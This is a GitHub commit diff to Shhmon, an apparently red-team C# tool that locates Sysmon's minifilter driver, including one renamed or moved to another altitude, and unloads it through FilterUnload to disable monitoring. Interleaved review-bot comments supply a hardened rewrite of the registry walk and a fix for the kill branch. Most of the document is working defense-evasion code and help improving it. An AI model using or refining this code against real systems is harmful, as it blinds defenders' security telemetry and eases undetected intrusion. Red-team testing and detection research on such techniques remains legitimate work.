

Added logic to handle when Sysmon's driver name is changed and set to…
… run at a different altitude

This technique walks the registry looking for a subkey of "Sysmon Instance" and pulls the altitude from that.
matterpreter committed Sep 16, 2019
1 parent a45973c commit 36ad7a9
Showing 2 changed files with 67 additions and 3 deletions.
31 changes: 31 additions & 0 deletions Shhmon/FilterParser.cs
Expand Up @@ -2,6 +2,7 @@
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
using Microsoft.Win32;

namespace Shhmon
{
Expand Down Expand Up @@ -144,6 +145,36 @@ private static IEnumerable<FilterInfo> MarshalFilterInfo(IntPtr ptr)

return result;
}

public static void WalkRegistryKeys(out string altName, out string altitude)
{
altName = null;
altitude = null;

RegistryKey hklm = Registry.LocalMachine;
RegistryKey services = hklm.OpenSubKey(@"SYSTEM\CurrentControlSet\Services");

foreach (string service in services.GetSubKeyNames())
{
RegistryKey serviceSubkey = services.OpenSubKey(service);
foreach (string subkeyName in serviceSubkey.GetSubKeyNames())
{
if (subkeyName.Contains("Instances"))
{
RegistryKey servicesSubsubkey = serviceSubkey.OpenSubKey(subkeyName);
foreach (string subsubkeyName in servicesSubsubkey.GetSubKeyNames())
{
if (subsubkeyName.Equals("Sysmon Instance"))
{
RegistryKey sysmonAltitude = servicesSubsubkey.OpenSubKey(subsubkeyName);
altitude = sysmonAltitude.GetValue("Altitude").ToString();
altName = service;
}
}
}
}
}
}
}

}
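Review bot: WalkRegistryKeys never disposes the RegistryKey handles it opens (services, serviceSubkey, servicesSubsubkey, sysmonAltitude) and dereferences every OpenSubKey result without a null check, so a single service key that cannot be opened aborts the whole walk with a NullReferenceException rather than being skipped; on .NET Framework an ACL-restricted key may instead surface as a SecurityException, which the method also does not handle. `sysmonAltitude.GetValue("Altitude").ToString()` throws the same way if an instance key has no Altitude value. Registry key names are case-insensitive, so `subsubkeyName.Equals("Sysmon Instance")` and `subkeyName.Contains("Instances")` should compare with `StringComparison.OrdinalIgnoreCase` (via `IndexOf` for the substring test, since the `Contains` overload taking a comparison is not available on every target framework). The rewrite below scopes each key in a using block, skips keys that fail to open, and reads the altitude null-safely; the last matching instance still wins, as before. A `/// <summary>` stating that both out parameters are left null when no "Sysmon Instance" key is found would document the contract the caller already relies on.
```csharp
public static void WalkRegistryKeys(out string altName, out string altitude)
{
    altName = null;
    altitude = null;

    using (RegistryKey services = Registry.LocalMachine.OpenSubKey(@"SYSTEM\CurrentControlSet\Services"))
    {
        if (services == null)
        {
            return;
        }

        foreach (string service in services.GetSubKeyNames())
        {
            using (RegistryKey serviceSubkey = services.OpenSubKey(service))
            {
                if (serviceSubkey == null)
                {
                    continue; // key vanished or is not readable; skip it rather than throw
                }

                foreach (string subkeyName in serviceSubkey.GetSubKeyNames())
                {
                    if (subkeyName.IndexOf("Instances", StringComparison.OrdinalIgnoreCase) < 0)
                    {
                        continue;
                    }

                    using (RegistryKey instances = serviceSubkey.OpenSubKey(subkeyName))
                    {
                        if (instances == null)
                        {
                            continue;
                        }

                        foreach (string instanceName in instances.GetSubKeyNames())
                        {
                            if (!instanceName.Equals("Sysmon Instance", StringComparison.OrdinalIgnoreCase))
                            {
                                continue;
                            }

                            using (RegistryKey instance = instances.OpenSubKey(instanceName))
                            {
                                // Null-safe: a missing Altitude value leaves altitude null,
                                // which the caller already treats as "not found".
                                altitude = instance?.GetValue("Altitude")?.ToString();
                                altName = service;
                            }
                        }
                    }
                }
            }
        }
    }
}
```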
39 changes: 36 additions & 3 deletions Shhmon/Program.cs
Expand Up @@ -9,6 +9,12 @@ class Program
{
static void Main(string[] args)
{
if (args.Length < 1)
{
Console.WriteLine("[-] Missing args");
Console.WriteLine("[-] Usage: Shhmon.exe <hunt|kill>");
Environment.Exit(1);
}
if (args[0] == "hunt" || args[0] == "kill")
{
if (!IsAdmin())
Expand Down Expand Up @@ -37,12 +43,13 @@ static void Main(string[] args)
status = Win32.FilterUnload(filter.Name);
if (!status.Equals(0))
{
Console.WriteLine("[-] Driver unload failed");
Console.WriteLine("[-] Driver unload failed - Error: {0}", String.Format("{0:X}", status));
}
else
{
Console.WriteLine("[+] SysmonDrv was unloaded :)");
}

}

}
Expand All @@ -57,7 +64,8 @@ static void Main(string[] args)
status = Win32.FilterUnload(filter.Name);
if (!status.Equals(0))
{
Console.WriteLine("[-] Driver unload failed");
Console.WriteLine("[-] Driver unload failed - Error: {0}", String.Format("{0:X}", status));

}
else
{
Expand All @@ -69,7 +77,32 @@ static void Main(string[] args)
}
if (!found)
{
Console.WriteLine("[-] No driver found at altitude 385201");
Console.WriteLine("[-] No driver found at altitude 385201. Checking for Sysmon running at a different altitude.");

FilterParser.WalkRegistryKeys(out string altName, out string altitude);
if (!string.IsNullOrWhiteSpace(altName) && !string.IsNullOrWhiteSpace(altitude))
{
Console.WriteLine("[+] Found Sysmon running as {0} at altitude {1}", altName, altitude);
if (args[0] == "kill")
{
Console.WriteLine("[+] Trying to kill the driver...");
Win32.OpenProcessToken(Process.GetCurrentProcess().Handle, Win32.TOKEN_ALL_ACCESS, out currentProcessToken);
Tokens.SetTokenPrivilege(ref currentProcessToken);
status = Win32.FilterUnload(altName);
if (!status.Equals(0))
{
Console.WriteLine("[-] Driver unload failed - Error: {0}", String.Format("{0:X}", status));
}
else
{
Console.WriteLine("[+] {0} was unloaded :)", altName);
}
}
}
}
else
{
Console.WriteLine("[-] Sysmon does not appear to be installed");
}
}
else
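Review bot: In the last hunk the new `else { Console.WriteLine("[-] Sysmon does not appear to be installed"); }` pairs with `if (!found)`, not with the `if (!string.IsNullOrWhiteSpace(altName) && !string.IsNullOrWhiteSpace(altitude))` test it was evidently written for: counting braces from `if (!found) {`, the fourth `}` after the `"[+] {0} was unloaded :)"` line already closes the `if (!found)` block, so the "not installed" message is printed precisely when a driver was found at 385201, and nothing at all is printed when neither the altitude scan nor the registry walk finds Sysmon. The rendered view has lost indentation, so confirm against the file, but the fix is to move one brace: delete the `}` immediately before that `else` and add a `}` after the `else` block's closing brace, making the branch the else of the registry-walk check. Main, including the declarations of `found`, `status` and `currentProcessToken`, begins and ends outside this hunk. As a point of style, the `String.Format("{0:X}", status)` nested inside Console.WriteLine in the second, third and fourth hunks can be folded into the outer format string, `Console.WriteLine("[-] Driver unload failed - Error: {0:X}", status);`.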

